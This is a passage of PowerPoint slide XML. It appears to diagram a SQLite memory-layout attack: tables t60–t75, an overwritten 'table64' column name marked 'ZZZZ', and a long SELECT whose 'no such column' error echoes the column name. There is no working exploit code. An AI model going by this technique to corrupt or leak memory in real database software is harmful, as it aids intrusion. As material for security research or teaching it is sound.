            <a:ext cx="6150274" cy="1565567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="6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0" name="Rectangle 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850200" y="3280500"/>
            <a:ext cx="4958487" cy="517237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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1" name="TextBox 150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927140" y="3350499"/>
            <a:ext cx="4693110" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table64’s column name AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>AA……………</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7455422" y="2905125"/>
            <a:ext cx="0" cy="52387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3998374" y="4309501"/>
            <a:ext cx="276299" cy="456008"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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V="1">
            <a:off x="4653574" y="4309501"/>
            <a:ext cx="5771373" cy="456008"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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135" name="Rectangle 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472597"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554181828"/>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0480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Rectangle 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687883" y="424276"/>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Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4474902" y="424275"/>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5255482" y="424274"/>
            <a:ext cx="782508" cy="12528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Rectangle 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7031355" y="417946"/>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Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7814046" y="417841"/>
            <a:ext cx="782508" cy="13815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Rectangle 83"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915714"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6" name="Rectangle 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690089" y="686611"/>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Rectangle 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5252513"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Rectangle 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032811"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Rectangle 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6813109" y="687623"/>
            <a:ext cx="782508" cy="13060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1" name="Rectangle 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7595578" y="682989"/>
            <a:ext cx="782508" cy="136253"/>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1381173" y="166408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2036479" y="166253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91679" y="166253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Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="166253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3999010" y="166253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7" name="Rectangle 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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8" name="Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="166253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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="166253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1" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817" y="166421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2" name="Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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Rectangle 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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3" name="Rectangle 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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4" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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5" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125" y="165999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6" name="Rectangle 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381173" y="1148398"/>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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036479" y="1146847"/>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8" name="Rectangle 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691679" y="1146847"/>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9" name="Rectangle 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="1146846"/>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0" name="Rectangle 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3999010" y="114684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1" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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2" name="Rectangle 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="1146845"/>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3" name="Rectangle 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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4" name="Rectangle 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="114684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5" name="Rectangle 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817" y="114852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6" name="Rectangle 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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8" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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9" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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0" name="Rectangle 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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1" name="Rectangle 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125" y="114430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2" name="Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380537" y="4769604"/>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3" name="Rectangle 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035843" y="476805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4" name="Rectangle 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691043" y="4768053"/>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5" name="Rectangle 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346243" y="4768052"/>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6" name="Rectangle 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998374" y="476805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7" name="Rectangle 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653574"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8" name="Rectangle 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309082" y="4768051"/>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9" name="Rectangle 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960905"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0" name="Rectangle 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6614981" y="476805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1" name="Rectangle 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270181" y="4769730"/>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2" name="Rectangle 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7923692"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3" name="Rectangle 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578042"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4" name="Rectangle 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233318"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5" name="Rectangle 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9890881"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6" name="Rectangle 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546081"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7" name="Rectangle 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11203489" y="4765509"/>
            <a:ext cx="655200"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8" name="TextBox 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600199" y="1373708"/>
            <a:ext cx="10040113" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>SELECT AAAAAAAAAAAAAA……. From table64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⇒ “Error: no such column: AAAAAAAAAAA…”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="TextBox 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475982" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t60</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115363" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t61</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="TextBox 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790711" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t62</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3430409" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t63</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074681" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739232" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t65</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406288" y="4859804"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t66</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="TextBox 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049581" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t67</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697149" y="4849828"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t68</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349810" y="4862876"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t69</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="TextBox 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8016630" y="4854020"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t70</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669182" y="4857391"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t71</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextBox 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9307330" y="4858264"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t72</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="TextBox 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9962530" y="4853515"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t73</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="TextBox 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617730" y="4869179"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t74</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11265763" y="4857884"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t75</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Rectangle 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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9" name="Rectangle 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274673" y="2743934"/>
            <a:ext cx="6150274" cy="1565567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="6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0" name="Rectangle 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850200" y="3280500"/>
            <a:ext cx="4958487" cy="517237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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1" name="TextBox 150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927140" y="3350499"/>
            <a:ext cx="4693110" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table64’s column name AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
